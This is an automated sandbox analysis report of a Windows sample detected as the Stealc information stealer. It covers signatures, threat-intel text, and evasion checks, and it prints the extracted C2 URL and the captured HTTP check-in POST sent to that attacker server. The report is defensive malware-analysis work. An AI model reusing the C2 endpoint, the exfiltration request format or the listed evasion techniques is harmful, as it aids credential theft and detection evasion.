Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520353
MD5:db555e4fdc380e9e8a19fcc609f7d1aa
SHA1:be66e90a5d5ce54f1a90bd59a3b4723e1a53d89c
SHA256:c1cd69890f1f81efd491b94bfff2d9e1263f4a843fc42b649aac082cf378f3a8
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DB555E4FDC380E9E8A19FCC609F7D1AA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2223713103.0000000000D58000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2182199807.0000000004C60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1524JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1524JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.2a0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T08:40:14.705683+020020442431Malware Command and Control Activity Detected192.168.2.649711185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpmAvira URL Cloud: Label: malware
                Source: http://185.215.113.37/6122658-3693405117-2476756634-1003Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/wsAvira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpAvira URL Cloud: Label: malware
                Source: http://185.215.113.37/3Avira URL Cloud: Label: malware
                Source: http://185.215.113.37Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.php14Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.php7Avira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpcAvira URL Cloud: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpwAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.2a0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 47%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_002AC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_002A7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_002A9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_002A9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_002B8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002B38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002B4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_002ADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_002AE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_002AED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_002B4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002ADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_002ABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_002B3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002AF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002A16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 43 39 34 30 34 33 46 36 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="hwid"66C94043F6901942779736------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build"save------BFIIIDAFBFBKECBGDBGI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002A4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_002A4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 43 39 34 30 34 33 46 36 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="hwid"66C94043F6901942779736------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build"save------BFIIIDAFBFBKECBGDBGI--
                Source: file.exe, 00000000.00000002.2223713103.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/3
                Source: file.exe, 00000000.00000002.2223713103.0000000000D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/6122658-3693405117-2476756634-1003
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php14
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
                Source: file.exe, 00000000.00000002.2223713103.0000000000DB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
                Source: file.exe, 00000000.00000002.2223713103.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.2223713103.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37P

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006720200_2_00672020
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067888A0_2_0067888A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066E95C0_2_0066E95C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052D1C50_2_0052D1C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054AA5D0_2_0054AA5D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00546A190_2_00546A19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F02960_2_005F0296
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067A2B70_2_0067A2B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E5B490_2_006E5B49
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065935A0_2_0065935A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067DBD10_2_0067DBD1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057F3B20_2_0057F3B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FF3A50_2_005FF3A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007874E00_2_007874E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006704F90_2_006704F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067F4C30_2_0067F4C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005165530_2_00516553
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057155B0_2_0057155B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C16D60_2_005C16D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00676EDC0_2_00676EDC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067BEA20_2_0067BEA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E36960_2_005E3696
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D1F280_2_005D1F28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00680FBD0_2_00680FBD
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 002A45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: fbyhctql ZLIB complexity 0.9949639605462822
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_002B9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_002B3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FMFPFK3X.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1843200 > 1048576
                Source: file.exeStatic PE information: Raw size of fbyhctql is bigger than: 0x100000 < 0x19be00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.2a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fbyhctql:EW;dwaepsqc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fbyhctql:EW;dwaepsqc:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002B9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c96b1 should be: 0x1c826e
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: fbyhctql
                Source: file.exeStatic PE information: section name: dwaepsqc
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BB035 push ecx; ret 0_2_002BB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074906B push eax; mov dword ptr [esp], 05317ADBh0_2_0074908F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074906B push 7F22905Ah; mov dword ptr [esp], esi0_2_00749173
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EA85F push 5D4B2445h; mov dword ptr [esp], eax0_2_006EA883
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EA85F push esi; mov dword ptr [esp], eax0_2_006EA9AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push 759D9C00h; mov dword ptr [esp], edx0_2_00672049
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push edx; mov dword ptr [esp], edi0_2_00672060
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push edi; mov dword ptr [esp], ebp0_2_00672064
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push esi; mov dword ptr [esp], 73BE916Eh0_2_006720D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push ebp; mov dword ptr [esp], edx0_2_0067219B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push 7AA7A633h; mov dword ptr [esp], esi0_2_006721A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push 48798A93h; mov dword ptr [esp], eax0_2_006721D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push 2658D12Dh; mov dword ptr [esp], edi0_2_006721E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push edi; mov dword ptr [esp], eax0_2_006721FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push edi; mov dword ptr [esp], ebx0_2_00672286
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push ebp; mov dword ptr [esp], ebx0_2_00672298
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push esi; mov dword ptr [esp], ebp0_2_006722D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push 1B5F58F1h; mov dword ptr [esp], ebp0_2_00672301
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push 7FE14CEFh; mov dword ptr [esp], edi0_2_0067236D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push 15D976C1h; mov dword ptr [esp], ebp0_2_00672408
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push ebp; mov dword ptr [esp], ebx0_2_00672523
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push ebp; mov dword ptr [esp], 3F9F51ACh0_2_006725C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push eax; mov dword ptr [esp], 6ED953EDh0_2_0067262F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push eax; mov dword ptr [esp], edi0_2_00672646
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push eax; mov dword ptr [esp], 5307BF52h0_2_006726D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push ecx; mov dword ptr [esp], edx0_2_00672781
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push esi; mov dword ptr [esp], edi0_2_006728A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push 7E58CDDEh; mov dword ptr [esp], edi0_2_006728CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push eax; mov dword ptr [esp], esi0_2_00672956
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push ecx; mov dword ptr [esp], 72FAA9B9h0_2_0067296B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00672020 push esi; mov dword ptr [esp], 6DEFA45Bh0_2_00672A29
                Source: file.exeStatic PE information: section name: fbyhctql entropy: 7.95281216056825

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002B9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13664
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684A4A second address: 684A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684A4F second address: 684A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBF78E7B356h 0x0000000a jmp 00007FBF78E7B361h 0x0000000f jnl 00007FBF78E7B356h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684BD0 second address: 684BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684D14 second address: 684D19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
